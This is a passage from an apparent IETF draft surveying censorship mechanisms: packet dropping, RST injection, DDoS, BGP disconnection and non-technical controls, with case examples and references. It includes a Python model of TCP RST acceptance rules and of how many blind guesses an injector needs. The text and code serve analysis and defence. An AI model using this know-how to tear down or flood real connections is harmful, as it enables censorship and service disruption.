Packet dropping is a simple mechanism to prevent undesirable traffic. The censor identifies undesirable traffic and chooses not to properly forward any packets it sees associated with that traffic, instead of following the normal routing protocol. This can be paired with any of the previously described mechanisms so long as the censor knows the user must route traffic through a controlled router.

*Trade-offs:* Packet Dropping is most successful when every traversing packet has transparent information linked to undesirable content, such as a destination IP. One downside Packet Dropping suffers from is the necessity of blocking all content from otherwise allowable IPs based on a single subversive sub-domain; blogging services and GitHub repositories are good examples. China famously dropped all GitHub packets for three days based on a single repository hosting undesirable content [Anonymous-2013]. The need to inspect every traversing packet in close to real time also makes Packet Dropping somewhat challenging from a QoS perspective.

*Empirical Examples:* Packet Dropping is a very common form of technical interference and lends itself to accurate detection given the unique nature of the time-outs it leaves in its wake. The Great Firewall of China has been observed using packet dropping as one of its primary mechanisms of technical censorship [Ensafi-2013]. Iran has also used Packet Dropping as the mechanism for throttling SSH [Aryan-2012]. These are but two examples of a ubiquitous censorship practice.

4.2.3. RST Packet Injection

Packet injection, generally, refers to a man-in-the-middle (MITM) network interference technique that spoofs packets in an established traffic stream.
RST packets are normally used to let one side of a TCP connection know that the other side has stopped sending information, and thus the receiver should close the connection. RST Packet Injection is a specific type of packet injection attack that is used to interrupt an established stream by sending RST packets to both sides of a TCP connection; as each receiver thinks the other has dropped the connection, the session is terminated.

*Trade-offs:* RST Packet Injection has a few advantages that make it extremely popular as a censorship technique. RST Packet Injection is an out-of-band interference mechanism, allowing the avoidance of the QoS bottleneck one can encounter with inline techniques such as Packet Dropping. This out-of-band property allows a censor to inspect a copy of the information, usually mirrored by an optical splitter, making it an ideal pairing for DPI and Protocol Identification [Weaver-2009] (this asynchronous version of a MITM is often called a Man-on-the-Side (MOTS)). RST Packet Injection also has the advantage of only requiring one of the two endpoints to accept the spoofed packet for the connection to be interrupted.

The difficult part of RST Packet Injection is spoofing "enough" correct information to ensure one end-point accepts an RST packet as legitimate; this generally implies a correct IP, port, and (TCP) sequence number. The sequence number is the hardest to get correct, as [RFC0793] specifies that an RST packet should be in-sequence to be accepted, although the RFC also recommends allowing in-window packets as "good enough". This in-window recommendation is important, as if it is implemented it allows for successful Blind RST Injection attacks [Netsec-2011].
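The in-sequence versus in-window acceptance rule decides how exposed a TCP endpoint is to this kind of injection. The Python below is an added example, not from the draft: it encodes both RFC 793 readings, adds the RFC 5961 challenge-ACK rule that modern stacks deploy as the mitigation, and computes how many windows a sender with no sequence knowledge would have to cover under each policy; the connection state in it is constructed.

```python
"""RST acceptance policies and blind-injection exposure for a TCP receiver.
Added example, not from the draft; it encodes the RFC 793 rules discussed
above plus the RFC 5961 challenge-ACK mitigation that modern stacks use."""

SEQ_SPACE = 1 << 32          # TCP sequence numbers are 32-bit and wrap


def seq_in_window(seg_seq, rcv_nxt, rcv_wnd):
    """RFC 793 acceptability test: RCV.NXT <= SEG.SEQ < RCV.NXT + RCV.WND, modulo 2^32."""
    return (seg_seq - rcv_nxt) % SEQ_SPACE < rcv_wnd


def rst_action(seg_seq, rcv_nxt, rcv_wnd, policy):
    """What the receiver does with an RST whose sequence number is seg_seq.

    policy:
      'in_window'     the permissive RFC 793 reading: any in-window RST resets
      'exact'         only SEG.SEQ == RCV.NXT resets; other in-window RSTs are dropped
      'challenge_ack' RFC 5961 section 3.2: exact match resets, any other in-window
                      RST is answered with an ACK so a genuine peer can re-send an
                      RST at RCV.NXT; a blind sender never learns that value
    Returns 'reset', 'drop' or 'challenge_ack'.
    """
    if seg_seq == rcv_nxt:
        return "reset"
    if not seq_in_window(seg_seq, rcv_nxt, rcv_wnd):
        return "drop"
    if policy == "in_window":
        return "reset"
    if policy == "exact":
        return "drop"
    if policy == "challenge_ack":
        return "challenge_ack"
    raise ValueError("unknown policy: %r" % policy)


def blind_windows(rcv_wnd):
    """Number of windows that tile the 2^32 space: the guesses a sender with no
    sequence knowledge needs under 'in_window' (65536 for a 64 KiB window, the
    draft's "~70000")."""
    return -(-SEQ_SPACE // rcv_wnd)       # ceiling division


def resets_under_sweep(rcv_nxt, rcv_wnd, policy):
    """Count how many of the blind_windows() candidate RSTs, one per window,
    would reset the connection under the given policy."""
    candidates = range(0, SEQ_SPACE, rcv_wnd)
    return sum(1 for s in candidates if rst_action(s, rcv_nxt, rcv_wnd, policy) == "reset")


if __name__ == "__main__":
    nxt, wnd = 0x1A2B3C4D, 65536        # constructed connection state
    print("windows to cover:", blind_windows(wnd))
    for policy in ("in_window", "exact", "challenge_ack"):
        print(policy, "resets from one sweep:", resets_under_sweep(nxt, wnd, policy))
```

Under 'in_window' one sweep of about 65 thousand candidates always contains exactly one accepted RST; under 'exact' or 'challenge_ack' the same sweep resets nothing unless a candidate happens to equal RCV.NXT, which moves the search to the full 2^32 space.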
When in-window sequencing is allowed, it is trivial to conduct a Blind RST Injection. A blind injection implies that the censor doesn't know any sensitive (encrypted) sequencing information about the TCP stream they are injecting into, so they can simply enumerate the ~70000 possible windows; this is particularly useful for interrupting encrypted/obfuscated protocols such as SSH or Tor. RST Packet Injection relies on a stateful network, making it useless against UDP connections. RST Packet Injection is among the most popular censorship techniques used today given its versatile nature and effectiveness against all types of TCP traffic.

*Empirical Examples:* RST Packet Injection, as mentioned above, is most often paired with identification techniques that require splitting, such as DPI or Protocol Identification. In 2007, Comcast was accused of using RST Packet Injection to interrupt traffic it identified as BitTorrent [Schoen-2007]; this later led to a US Federal Communications Commission ruling against Comcast [VonLohmann-2008]. China has also been known to use RST Packet Injection for censorship purposes. This interference is especially evident in the interruption of encrypted/obfuscated protocols, such as those used by Tor [Winter-2012].

4.3. Multi-layer and Non-layer

4.3.1. Distributed Denial of Service (DDoS)

Distributed Denial of Service attacks are a common attack mechanism used by "hacktivists" and malicious hackers, but censors have used DDoS in the past for a variety of reasons. There is a huge variety of DDoS attacks [Wikip-DoS], but at a high level two possible impacts tend to occur: a flood attack results in the service being unusable while resources are being spent to flood the service, while a crash attack aims to crash the service so resources can be reallocated elsewhere without "releasing" the service.
*Trade-offs:* DDoS is an appealing mechanism when a censor would like to prevent all access to undesirable content, instead of only access in their region for a limited period of time, but this is really the only uniquely beneficial feature of DDoS as a censorship technique. The resources required to carry out a successful DDoS against major targets are computationally expensive, usually requiring renting or owning a malicious distributed platform such as a botnet, and imprecise. DDoS is an incredibly crude censorship technique, and appears to largely be used as a timely, easy-to-access mechanism for blocking undesirable content for a limited period of time.

*Empirical Examples:* In 2012 the U.K.'s GCHQ used DDoS to temporarily shut down IRC chat rooms frequented by members of Anonymous using the SYN flood DDoS method; a SYN flood exploits the handshake used by TCP to overload the victim server with so many requests that legitimate traffic becomes slow or impossible [Schone-2014] [CERT-2000]. Dissenting opinion websites are frequently victims of DDoS around politically sensitive events in Burma [Villeneuve-2011]. Controlling parties in Russia [Kravtsova-2012], Zimbabwe [Orion-2013], and Malaysia [Muncaster-2013] have been accused of using DDoS to interrupt opposition support and access during elections. In 2015, China launched a DDoS attack using a true MITM system co-located with the Great Firewall, dubbed "Great Cannon", that was able to inject JavaScript code into web visits to a Chinese search engine that commandeered those user agents to send DDoS traffic to various sites [Marczak-2015].

4.3.2. Network Disconnection or Adversarial Route Announcement

While it is perhaps the crudest of all censorship techniques, there is no more effective way of making sure undesirable information isn't allowed to propagate on the web than by shutting off the network. The network can be logically cut off in a region when a censoring body withdraws all of the Border Gateway Protocol (BGP) prefixes routing through the censor's country.

*Trade-offs:* The impact of a network disconnection in a region is huge and absolute; the censor pays for absolute control over digital information with all the benefits the Internet brings; this is never a long-term solution for any rational censor and is normally only used as a last resort in times of substantial unrest.

*Empirical Examples:* Network Disconnections tend to only happen in times of substantial unrest, largely due to the huge social, political, and economic impact such a move has. One of the first, highly covered occurrences was with the Junta in Myanmar employing Network Disconnection to help Junta forces quash a rebellion in 2007 [Dobie-2007]. China disconnected the network in the Xinjiang region during unrest in 2009 in an effort to prevent the protests from spreading to other regions [Heacock-2009]. The Arab Spring saw the most frequent usage of Network Disconnection, with events in Egypt and Libya in 2011 [Cowie-2011] [Cowie-2011b], and Syria in 2012 [Thomson-2012]. Russia has indicated that it will attempt to disconnect all Russian networks from the global internet in April 2019 as part of a test of the nation's network independence. Reports also indicate that, as part of the test disconnect, Russian telecom firms must route all traffic to state-operated monitoring points. (cite ZD Net: https://www.zdnet.com/article/russia-to-disconnect-from-the-internet-as-part-of-a-planned-test/)

5. Non-Technical Prescription

As the name implies, sometimes manpower is the easiest way to figure out which content to block. Manual Filtering differs from the common tactic of building up blacklists in that it doesn't necessarily target a specific IP or DNS name, but instead removes or flags content. Given the imprecise nature of automatic filtering, manually sorting through content and flagging dissenting websites, blogs, articles and other media for filtration can be an effective technique. This filtration can occur at the backbone/ISP level - China's army of monitors is a good example [BBC-2013b] - but more commonly manual filtering occurs at an institutional level. Internet Content Providers (ICPs) such as Google or Weibo require a business license to operate in China. One of the prerequisites for a business license is an agreement to sign a "voluntary pledge" known as the "Public Pledge on Self-discipline for the Chinese Internet Industry". The failure to "energetically uphold" the pledged values can lead to the ICPs being held liable for the offending content by the Chinese government [BBC-2013b].

6. Non-Technical Interference

6.1. Self-Censorship

Self-censorship is one of the most interesting and effective types of censorship; a mix of Bentham's Panopticon, cultural manipulation, intelligence gathering, and meatspace enforcement. Simply put, self-censorship is when a censor creates an atmosphere where users censor themselves. This can be achieved through controlling information, intimidating would-be dissidents, swaying public thought, and creating apathy. Self-censorship is difficult to document, as when it is implemented effectively the only noticeable trace is a lack of undesirable content; instead one must look at the tools and techniques used by censors to encourage self-censorship. Controlling information relies on traditional censorship techniques, or on forcing all users to connect through an intranet, such as in North Korea. Intimidation is often achieved through allowing Internet users to post "whatever they want," but arresting those who post about dissenting views; this technique is incredibly common [Calamur-2013] [AP-2012] [Hopkins-2011] [Guardian-2014] [Johnson-2010]. A good example of swaying public thought is China's "50-Cent Party," reported to be composed of somewhere between 20,000 [Bristow-2013] and 300,000 [Fareed-2008] contributors who are paid to "guide public thought" on local and regional issues as directed by the Ministry of Culture. Creating apathy can be a side-effect of successfully controlling information over time and is ideal for a censorship regime [Gao-2014].

6.2. Domain Name Reallocation

Because domain names are resolved recursively, if a root name server reassigns or delists a domain, all other DNS servers will be unable to properly forward and cache the site. Domain name registration is only really a risk where undesirable content is hosted on a TLD controlled by the censoring country, such as .cn or .ru [Anderson-2011], or where legal processes in countries like the United States result in domain name seizures and/or DNS redirection by the government [Kopel-2013].

6.3. Server Takedown

Servers must have a physical location somewhere in the world. If undesirable content is hosted in the censoring country, the servers can be physically seized or the hosting provider can be required to prevent access [Anderson-2011].

6.4. Notice and Takedown

In some countries, legal mechanisms exist where an individual can issue a legal request to a content host that requires the host to take down content. Examples include the voluntary systems employed by companies like Google to comply with "Right to be Forgotten" policies in the European Union [Google-RTBF] and the copyright-oriented notice and takedown regime of the United States Digital Millennium Copyright Act (DMCA) Section 512 [DMLP-512].

7. Contributors

This document benefited from discussions with Stephane Bortzmeyer, Nick Feamster, and Martin Nilsson.

8. Informative References

[AFNIC-2013]  AFNIC, "Report of the AFNIC Scientific Council: Consequences of DNS-based Internet filtering", 2013.

[AFP-2014]  AFP, "China Has Massive Internet Breakdown Reportedly Caused By Their Own Censoring Tools", 2014.

[Albert-2011]  Albert, K., "DNS Tampering and the new ICANN gTLD Rules", 2011.

[Anderson-2011]  Anderson, R. and S. Murdoch, "Access Denied: Tools and Technology of Internet Filtering", 2011.

[Anon-SIGCOMM12]  Anonymous, "The Collateral Damage of Internet Censorship by DNS Injection", 2012.

[Anonymous-2007]  Anonymous, "How to Bypass Comcast's Bittorrent Throttling", 2012.

[Anonymous-2013]  Anonymous, "GitHub blocked in China - how it happened, how to get around it, and where it will take us", 2013.

[Anonymous-2014]  Anonymous, "Towards a Comprehensive Picture of the Great Firewall's DNS Censorship", 2014.

[AP-2012]  Associated Press, "Sattar Beheshit, Iranian Blogger, Was Beaten In Prison According To Prosecutor", 2012.

[Aryan-2012]  Aryan, S., Aryan, H., and J. Halderman, "Internet Censorship in Iran: A First Look", 2012.

[BBC-2013]  BBC News, "Google and Microsoft agree steps to block abuse images", 2013.

[BBC-2013b]  BBC, "China employs two million microblog monitors state media say", 2013.
[Bortzmayer-2015]  Bortzmeyer, S., "DNS Censorship (DNS Lies) As Seen By RIPE Atlas", 2015.

[Bristow-2013]  Bristow, M., "China's internet 'spin doctors'", 2013.

[Calamur-2013]  Calamur, K., "Prominent Egyptian Blogger Arrested", 2013.

[CERT-2000]  CERT, "TCP SYN Flooding and IP Spoofing Attacks", 2000.

[Cheng-2010]  Cheng, J., "Google stops Hong Kong auto-redirect as China plays hardball", 2010.

[Clayton-2006]  Clayton, R., "Ignoring the Great Firewall of China", 2006.

[Condliffe-2013]  Condliffe, J., "Google Announces Massive New Restrictions on Child Abuse Search Terms", 2013.

[Cowie-2011]  Cowie, J., "Egypt Leaves the Internet", 2011.

[Cowie-2011b]  Cowie, J., "Libyan Disconnect", 2011.

[Crandall-2010]  Crandall, J., "Empirical Study of a National-Scale Distributed Intrusion Detection System: Backbone-Level Filtering of HTML Responses in China", 2010.

[Dalek-2013]  Dalek, J., "A Method for Identifying and Confirming the Use of URL Filtering Products for Censorship", 2013.

[Ding-1999]  Ding, C., Chi, C., Deng, J., and C. Dong, "Centralized Content-Based Web Filtering and Blocking: How Far Can It Go?", 1999.

[DMLP-512]  Digital Media Law Project, "Protecting Yourself Against Copyright Claims Based on User Content", 2012.

[Dobie-2007]  Dobie, M., "Junta tightens media screw", 2007.

[Ensafi-2013]  Ensafi, R., "Detecting Intentional Packet Drops on the Internet via TCP/IP Side Channels", 2013.

[Fareed-2008]  Fareed, M., "China joins a turf war", 2008.

[Fifield-2015]  Fifield, D., Lan, C., Hynes, R., Wegmann, P., and V. Paxson, "Blocking-resistant communication through domain fronting", 2015.

[Gao-2014]  Gao, H., "Tiananmen, Forgotten", 2014.
[Glanville-2008]  Glanville, J., "The Big Business of Net Censorship", 2008.

[Google-RTBF]  Google, Inc., "Search removal request under data protection law in Europe", 2015.

[Guardian-2014]  The Guardian, "Chinese blogger jailed under crackdown on 'internet rumours'", 2014.

[Halley-2008]  Halley, B., "How DNS cache poisoning works", 2014.

[Heacock-2009]  Heacock, R., "China Shuts Down Internet in Xinjiang Region After Riots", 2009.

[Hepting-2011]  Electronic Frontier Foundation, "Hepting vs. AT&T", 2011.

[Hjelmvik-2010]  Hjelmvik, E., "Breaking and Improving Protocol Obfuscation", 2010.

[Hopkins-2011]  Hopkins, C., "Communications Blocked in Libya, Qatari Blogger Arrested: This Week in Online Tyranny", 2011.

[Husak-2016]  Husak, M., Cermak, M., Jirsik, T., and P. Celeda, "HTTPS traffic analysis and client identification using passive SSL/TLS fingerprinting", 2016.

[ICANN-SSAC-2012]  ICANN Security and Stability Advisory Committee (SSAC), "SAC 056: SSAC Advisory on Impacts of Content Blocking via the Domain Name System", 2012.

[Johnson-2010]  Johnson, L., "Torture feared in arrest of Iraqi blogger", 2011.

[Jones-2014]  Jones, B., "Automated Detection and Fingerprinting of Censorship Block Pages", 2014.

[Khattak-2013]  Khattak, S., "Towards Illuminating a Censorship Monitor's Model to Facilitate Evasion", 2013.

[Kopel-2013]  Kopel, K., "Operation Seizing Our Sites: How the Federal Government is Taking Domain Names Without Prior Notice", 2013.

[Kravtsova-2012]  Kravtsova, Y., "Cyberattacks Disrupt Opposition's Election", 2012.
[Marczak-2015]  Marczak, B., Weaver, N., Dalek, J., Ensafi, R., Fifield, D., McKune, S., Rey, A., Scott-Railton, J., Deibert, R., and V. Paxson, "An Analysis of China's "Great Cannon"", 2015.

[Muncaster-2013]  Muncaster, P., "Malaysian election sparks web blocking/DDoS claims", 2013.

[Nabi-2013]  Nabi, Z., "The Anatomy of Web Censorship in Pakistan", 2013.

[Netsec-2011]  n3t2.3c, "TCP-RST Injection", 2011.

[Orion-2013]  Orion, E., "Zimbabwe election hit by hacking and DDoS attacks", 2013.

[Porter-2010]  Porter, T., "The Perils of Deep Packet Inspection", 2010.

[RFC0793]  Postel, J., "Transmission Control Protocol", STD 7, RFC 793, DOI 10.17487/RFC0793, September 1981.

[RFC6066]  Eastlake 3rd, D., "Transport Layer Security (TLS) Extensions: Extension Definitions", RFC 6066, DOI 10.17487/RFC6066, January 2011.

[RFC7624]  Barnes, R., Schneier, B., Jennings, C., Hardie, T., Trammell, B., Huitema, C., and D. Borkmann, "Confidentiality in the Face of Pervasive Surveillance: A Threat Model and Problem Statement", RFC 7624, DOI 10.17487/RFC7624, August 2015.

[RFC7754]  Barnes, R., Cooper, A., Kolkman, O., Thaler, D., and E. Nordmark, "Technical Considerations for Internet Service Blocking and Filtering", RFC 7754, DOI 10.17487/RFC7754, March 2016.

[RSF-2005]  Reporters Sans Frontieres, "Technical ways to get around censorship", 2005.

[Rushe-2015]  Rushe, D., "Bing censoring Chinese language search results for users in the US", 2013.

[Sandvine-2014]  Sandvine, "Technology Showcase on Traffic Classification: Why Measurements and Freeform Policy Matter", 2014.

[Schoen-2007]  Schoen, S., "EFF tests agree with AP: Comcast is forging packets to interfere with user traffic", 2007.
[Schone-2014]  Schone, M., Esposito, R., Cole, M., and G. Greenwald, "Snowden Docs Show UK Spies Attacked Anonymous, Hackers", 2014.

[Senft-2013]  Senft, A., "Asia Chats: Analyzing Information Controls and Privacy in Asian Messaging Applications", 2013.

[Shbair-2015]  Shbair, W., Cholez, T., Goichot, A., and I. Chrisment, "Efficiently Bypassing SNI-based HTTPS Filtering", 2015.

[Sophos-2015]  Sophos, "Understanding Sophos Web Filtering", 2015.

[Tang-2016]  Tang, C., "In-depth analysis of the Great Firewall of China", 2016.

[Thomson-2012]  Thomson, I., "Syria Cuts off Internet and Mobile Communication", 2012.

[Trustwave-2015]  Trustwave, "Filter: SNI extension feature and HTTPS blocking", 2015.

[Verkamp-2012]  Verkamp, J. and M. Gupta, "Inferring Mechanics of Web Censorship Around the World", 2012.

[Villeneuve-2011]  Villeneuve, N., "Open Access: Chapter 8, Control and Resistance, Attacks on Burmese Opposition Media", 2011.

[VonLohmann-2008]  VonLohmann, F., "FCC Rules Against Comcast for BitTorrent Blocking", 2008.

[Wagner-2009]  Wagner, B., "Deep Packet Inspection and Internet Censorship: International Convergence on an 'Integrated Technology of Control'", 2009.

[Wagstaff-2013]  Wagstaff, J., "In Malaysia, online election battles take a nasty turn", 2013.

[Weaver-2009]  Weaver, N., Sommer, R., and V. Paxson, "Detecting Forged TCP Packets", 2009.

[Whittaker-2013]  Whittaker, Z., "1,168 keywords Skype uses to censor, monitor its Chinese users", 2013.

[Wikip-DoS]  Wikipedia, "Denial of Service Attacks", 2016.

[Wilde-2012]  Wilde, T., "Knock Knock Knockin' on Bridges Doors", 2012.

[Winter-2012]  Winter, P., "How China is Blocking Tor", 2012.
[Zhu-2011]  Zhu, T., "An Analysis of Chinese Search Engine Filtering", 2011.

[Zmijewki-2014]  Zmijewski, E., "Turkish Internet Censorship Takes a New Turn", 2014.

Authors' Addresses

Joseph Lorenzo Hall
CDT

Email: joe@cdt.org

Michael D. Aaron
CU Boulder

Email: michael.aaron@colorado.edu

Stan Adams
CDT

Email: sadams@cdt.org

Ben Jones
Princeton

Email: bj6@cs.princeton.edu

Nick Feamster
Princeton

Email: feamster@cs.princeton.edu